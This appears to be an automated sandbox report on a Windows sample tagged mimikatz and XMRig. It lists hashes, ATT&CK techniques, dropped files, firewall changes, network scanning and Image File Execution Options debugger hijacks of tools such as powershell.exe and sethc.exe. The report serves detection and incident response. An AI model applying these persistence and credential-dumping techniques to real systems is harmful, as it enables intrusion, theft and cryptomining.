mimikatz | 4831afb062cabb60cd450d97b665acf37acaa6c54e9f532c2e3d32f55ca12d08

Analysis

max time kernel
150s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
26-11-2024 01:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-11-26_b92fa8e500704b2c39dabdc2665ac9fb_hacktools_icedid_mimikatz.exe
Size

17.6MB
MD5

b92fa8e500704b2c39dabdc2665ac9fb
SHA1

8f54ff3c3d69d9e2a463e7eacfb6cb0c9ec6d92a
SHA256

4831afb062cabb60cd450d97b665acf37acaa6c54e9f532c2e3d32f55ca12d08
SHA512

f7552c2860b280a354c3e947a4b50245b0b5975e9e403746d5552360ecd67f84cf5b8c50df6ff82ed141998571daf664ac918041829539914995d25ba9750c6a
SSDEEP

196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYPHlTPemknGzwHdOgEPHd9BYX/nivPl/:a3jz0E52/iv1E3jz0E52/iv1

Score

10^/10

mimikatz xmrig credential_access discovery evasion execution miner persistence privilege_escalation upx

Malware Config

Signatures

Disables service(s) 3 TTPs
evasion execution

Windows Service
T1543.003

Service Stop
T1489

Service Execution
T1569.002
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
mimikatz
Mimikatz family
mimikatz

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

yittybr.exe

description	pid	Process	procid_target
PID 4064 created 2236	4064	yittybr.exe	38

Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Contacts a large (19350) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
credential_access

LSASS Memory
T1003.001

XMRig Miner payload 10 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/3672-178-0x00007FF6B7290000-0x00007FF6B73B0000-memory.dmp	xmrig
behavioral2/memory/3672-183-0x00007FF6B7290000-0x00007FF6B73B0000-memory.dmp	xmrig
behavioral2/memory/3672-201-0x00007FF6B7290000-0x00007FF6B73B0000-memory.dmp	xmrig
behavioral2/memory/3672-214-0x00007FF6B7290000-0x00007FF6B73B0000-memory.dmp	xmrig
behavioral2/memory/3672-222-0x00007FF6B7290000-0x00007FF6B73B0000-memory.dmp	xmrig
behavioral2/memory/3672-233-0x00007FF6B7290000-0x00007FF6B73B0000-memory.dmp	xmrig
behavioral2/memory/3672-248-0x00007FF6B7290000-0x00007FF6B73B0000-memory.dmp	xmrig
behavioral2/memory/3672-497-0x00007FF6B7290000-0x00007FF6B73B0000-memory.dmp	xmrig
behavioral2/memory/3672-499-0x00007FF6B7290000-0x00007FF6B73B0000-memory.dmp	xmrig
behavioral2/memory/3672-527-0x00007FF6B7290000-0x00007FF6B73B0000-memory.dmp	xmrig

mimikatz is an open source tool to dump credentials on Windows 5 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3232-0-0x0000000000400000-0x0000000000A9B000-memory.dmp	mimikatz
behavioral2/memory/3232-4-0x0000000000400000-0x0000000000A9B000-memory.dmp	mimikatz
behavioral2/files/0x0007000000023c87-6.dat	mimikatz
behavioral2/memory/1252-8-0x0000000000400000-0x0000000000A9B000-memory.dmp	mimikatz
behavioral2/memory/3972-138-0x00007FF6E22C0000-0x00007FF6E23AE000-memory.dmp	mimikatz

Drops file in Drivers directory 2 IoCs

Processes:

yittybr.exewpcap.exe

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	yittybr.exe
File created	C:\Windows\system32\drivers\npf.sys	wpcap.exe

Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs

persistence

Image File Execution Options Injection

T1546.012

Processes:

yittybr.exe

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	yittybr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe	yittybr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe	yittybr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe	yittybr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	yittybr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe	yittybr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe	yittybr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	yittybr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe	yittybr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	yittybr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	yittybr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	yittybr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe	yittybr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	yittybr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe	yittybr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	yittybr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	yittybr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe	yittybr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	yittybr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe	yittybr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	yittybr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe	yittybr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe	yittybr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	yittybr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe	yittybr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	yittybr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe	yittybr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	yittybr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe	yittybr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe	yittybr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe	yittybr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	yittybr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe	yittybr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe	yittybr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe	yittybr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	yittybr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	yittybr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	yittybr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	yittybr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	yittybr.exe

Modifies Windows Firewall 2 TTPs 2 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

Processes:

netsh.exenetsh.exe

pid	Process
3148	netsh.exe
3920	netsh.exe

Executes dropped EXE 28 IoCs

Processes:

yittybr.exeyittybr.exewpcap.exebjfisnrbq.exevfshost.exebtjlhtrlh.exexohudmc.exefknvgk.exettlnnh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exeyittybr.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exevmlbqggye.exeyittybr.exe

pid	Process
1252	yittybr.exe
4064	yittybr.exe
1924	wpcap.exe
1248	bjfisnrbq.exe
3972	vfshost.exe
3404	btjlhtrlh.exe
4476	xohudmc.exe
3972	fknvgk.exe
3672	ttlnnh.exe
4932	btjlhtrlh.exe
1112	btjlhtrlh.exe
1732	btjlhtrlh.exe
2284	btjlhtrlh.exe
4624	yittybr.exe
1468	btjlhtrlh.exe
216	btjlhtrlh.exe
4900	btjlhtrlh.exe
3824	btjlhtrlh.exe
3156	btjlhtrlh.exe
512	btjlhtrlh.exe
4168	btjlhtrlh.exe
2484	btjlhtrlh.exe
4960	btjlhtrlh.exe
1708	btjlhtrlh.exe
5100	btjlhtrlh.exe
3572	btjlhtrlh.exe
4928	vmlbqggye.exe
1012	yittybr.exe

Loads dropped DLL 12 IoCs

Processes:

wpcap.exebjfisnrbq.exe

pid	Process
1924	wpcap.exe
1924	wpcap.exe
1924	wpcap.exe
1924	wpcap.exe
1924	wpcap.exe
1924	wpcap.exe
1924	wpcap.exe
1924	wpcap.exe
1924	wpcap.exe
1248	bjfisnrbq.exe
1248	bjfisnrbq.exe
1248	bjfisnrbq.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
68	ifconfig.me
69	ifconfig.me

Network Share Discovery 1 TTPs
Attempt to gather information on host network.
discovery

Network Share Discovery
T1135
Creates a Windows Service
persistence

Drops file in System32 directory 18 IoCs

Processes:

wpcap.exexohudmc.exeyittybr.exe

description	ioc	Process
File created	C:\Windows\SysWOW64\wpcap.dll	wpcap.exe
File created	C:\Windows\SysWOW64\Packet.dll	wpcap.exe
File created	C:\Windows\SysWOW64\fknvgk.exe	xohudmc.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	yittybr.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751	yittybr.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751	yittybr.exe
File created	C:\Windows\system32\Packet.dll	wpcap.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft	yittybr.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache	yittybr.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData	yittybr.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content	yittybr.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\088D7AA6D7DCA369223412E8DEF831B8	yittybr.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	yittybr.exe
File created	C:\Windows\SysWOW64\pthreadVC.dll	wpcap.exe
File created	C:\Windows\system32\wpcap.dll	wpcap.exe
File opened for modification	C:\Windows\SysWOW64\fknvgk.exe	xohudmc.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	yittybr.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\088D7AA6D7DCA369223412E8DEF831B8	yittybr.exe

UPX packed file 34 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/files/0x0007000000023ce2-134.dat	upx
behavioral2/memory/3972-135-0x00007FF6E22C0000-0x00007FF6E23AE000-memory.dmp	upx
behavioral2/memory/3972-138-0x00007FF6E22C0000-0x00007FF6E23AE000-memory.dmp	upx
behavioral2/files/0x0007000000023ced-141.dat	upx
behavioral2/memory/3404-142-0x00007FF696A90000-0x00007FF696AEB000-memory.dmp	upx
behavioral2/memory/3404-146-0x00007FF696A90000-0x00007FF696AEB000-memory.dmp	upx
behavioral2/files/0x0007000000023cea-163.dat	upx
behavioral2/memory/3672-164-0x00007FF6B7290000-0x00007FF6B73B0000-memory.dmp	upx
behavioral2/memory/4932-172-0x00007FF696A90000-0x00007FF696AEB000-memory.dmp	upx
behavioral2/memory/1112-176-0x00007FF696A90000-0x00007FF696AEB000-memory.dmp	upx
behavioral2/memory/3672-178-0x00007FF6B7290000-0x00007FF6B73B0000-memory.dmp	upx
behavioral2/memory/1732-181-0x00007FF696A90000-0x00007FF696AEB000-memory.dmp	upx
behavioral2/memory/3672-183-0x00007FF6B7290000-0x00007FF6B73B0000-memory.dmp	upx
behavioral2/memory/2284-186-0x00007FF696A90000-0x00007FF696AEB000-memory.dmp	upx
behavioral2/memory/1468-194-0x00007FF696A90000-0x00007FF696AEB000-memory.dmp	upx
behavioral2/memory/216-198-0x00007FF696A90000-0x00007FF696AEB000-memory.dmp	upx
behavioral2/memory/3672-201-0x00007FF6B7290000-0x00007FF6B73B0000-memory.dmp	upx
behavioral2/memory/4900-203-0x00007FF696A90000-0x00007FF696AEB000-memory.dmp	upx
behavioral2/memory/3824-207-0x00007FF696A90000-0x00007FF696AEB000-memory.dmp	upx
behavioral2/memory/3156-211-0x00007FF696A90000-0x00007FF696AEB000-memory.dmp	upx
behavioral2/memory/3672-214-0x00007FF6B7290000-0x00007FF6B73B0000-memory.dmp	upx
behavioral2/memory/512-216-0x00007FF696A90000-0x00007FF696AEB000-memory.dmp	upx
behavioral2/memory/4168-220-0x00007FF696A90000-0x00007FF696AEB000-memory.dmp	upx
behavioral2/memory/3672-222-0x00007FF6B7290000-0x00007FF6B73B0000-memory.dmp	upx
behavioral2/memory/2484-225-0x00007FF696A90000-0x00007FF696AEB000-memory.dmp	upx
behavioral2/memory/4960-229-0x00007FF696A90000-0x00007FF696AEB000-memory.dmp	upx
behavioral2/memory/1708-232-0x00007FF696A90000-0x00007FF696AEB000-memory.dmp	upx
behavioral2/memory/3672-233-0x00007FF6B7290000-0x00007FF6B73B0000-memory.dmp	upx
behavioral2/memory/5100-235-0x00007FF696A90000-0x00007FF696AEB000-memory.dmp	upx
behavioral2/memory/3572-237-0x00007FF696A90000-0x00007FF696AEB000-memory.dmp	upx
behavioral2/memory/3672-248-0x00007FF6B7290000-0x00007FF6B73B0000-memory.dmp	upx
behavioral2/memory/3672-497-0x00007FF6B7290000-0x00007FF6B73B0000-memory.dmp	upx
behavioral2/memory/3672-499-0x00007FF6B7290000-0x00007FF6B73B0000-memory.dmp	upx
behavioral2/memory/3672-527-0x00007FF6B7290000-0x00007FF6B73B0000-memory.dmp	upx

Drops file in Program Files directory 3 IoCs

Processes:

wpcap.exe

description	ioc	Process
File created	C:\Program Files\WinPcap\rpcapd.exe	wpcap.exe
File created	C:\Program Files\WinPcap\LICENSE	wpcap.exe
File created	C:\Program Files\WinPcap\uninstall.exe	wpcap.exe

Drops file in Windows directory 60 IoCs

Processes:

yittybr.exe2024-11-26_b92fa8e500704b2c39dabdc2665ac9fb_hacktools_icedid_mimikatz.exevmlbqggye.execmd.exe

description	ioc	Process
File created	C:\Windows\ppgkyibiq\UnattendGC\specials\coli-0.dll	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\specials\crli-0.dll	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\specials\svschost.exe	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\schoedcl.xml	yittybr.exe
File created	C:\Windows\ppgkyibiq\Corporate\mimidrv.sys	yittybr.exe
File created	C:\Windows\ppgkyibiq\ihnqsqiep\Packet.dll	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\specials\libeay32.dll	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\svschost.xml	yittybr.exe
File opened for modification	C:\Windows\tllefmnq\spoolsrv.xml	yittybr.exe
File opened for modification	C:\Windows\tllefmnq\vimpcsvc.xml	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\specials\libxml2.dll	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\specials\tucl-1.dll	yittybr.exe
File created	C:\Windows\tllefmnq\yittybr.exe	2024-11-26_b92fa8e500704b2c39dabdc2665ac9fb_hacktools_icedid_mimikatz.exe
File opened for modification	C:\Windows\tllefmnq\yittybr.exe	2024-11-26_b92fa8e500704b2c39dabdc2665ac9fb_hacktools_icedid_mimikatz.exe
File created	C:\Windows\tllefmnq\vimpcsvc.xml	yittybr.exe
File opened for modification	C:\Windows\ppgkyibiq\ihnqsqiep\Result.txt	vmlbqggye.exe
File created	C:\Windows\ppgkyibiq\ihnqsqiep\scan.bat	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\specials\cnli-1.dll	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\specials\docmicfg.exe	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\vimpcsvc.xml	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\specials\spoolsrv.xml	yittybr.exe
File created	C:\Windows\tllefmnq\schoedcl.xml	yittybr.exe
File created	C:\Windows\ppgkyibiq\ihnqsqiep\bjfisnrbq.exe	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\specials\posh-0.dll	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\specials\tibe-2.dll	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\spoolsrv.xml	yittybr.exe
File created	C:\Windows\ppgkyibiq\ihnqsqiep\ip.txt	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\specials\ucl.dll	yittybr.exe
File created	C:\Windows\ppgkyibiq\upbdrjv\swrpwe.exe	yittybr.exe
File opened for modification	C:\Windows\ppgkyibiq\ihnqsqiep\Packet.dll	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\specials\zlib1.dll	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\specials\svschost.xml	yittybr.exe
File opened for modification	C:\Windows\tllefmnq\svschost.xml	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\Shellcode.ini	yittybr.exe
File created	C:\Windows\ppgkyibiq\ihnqsqiep\wpcap.exe	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\specials\docmicfg.xml	yittybr.exe
File created	C:\Windows\tllefmnq\svschost.xml	yittybr.exe
File created	C:\Windows\ppgkyibiq\Corporate\mimilib.dll	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\specials\ssleay32.dll	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\specials\trch-1.dll	yittybr.exe
File created	C:\Windows\ime\yittybr.exe	yittybr.exe
File created	C:\Windows\ppgkyibiq\ihnqsqiep\vmlbqggye.exe	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\specials\xdvl-0.dll	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\docmicfg.xml	yittybr.exe
File opened for modification	C:\Windows\tllefmnq\schoedcl.xml	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\specials\vimpcsvc.xml	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\specials\schoedcl.xml	yittybr.exe
File created	C:\Windows\tllefmnq\docmicfg.xml	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\AppCapture64.dll	yittybr.exe
File opened for modification	C:\Windows\ppgkyibiq\Corporate\log.txt	cmd.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\specials\spoolsrv.exe	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\specials\vimpcsvc.exe	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\AppCapture32.dll	yittybr.exe
File created	C:\Windows\ppgkyibiq\Corporate\vfshost.exe	yittybr.exe
File created	C:\Windows\ppgkyibiq\ihnqsqiep\wpcap.dll	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\specials\exma-1.dll	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\specials\trfo-2.dll	yittybr.exe
File created	C:\Windows\tllefmnq\spoolsrv.xml	yittybr.exe
File opened for modification	C:\Windows\tllefmnq\docmicfg.xml	yittybr.exe
File created	C:\Windows\ppgkyibiq\UnattendGC\specials\schoedcl.exe	yittybr.exe

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exe

pid	Process
1200	sc.exe
4832	sc.exe
972	sc.exe
2552	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

Processes:

netsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exe

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
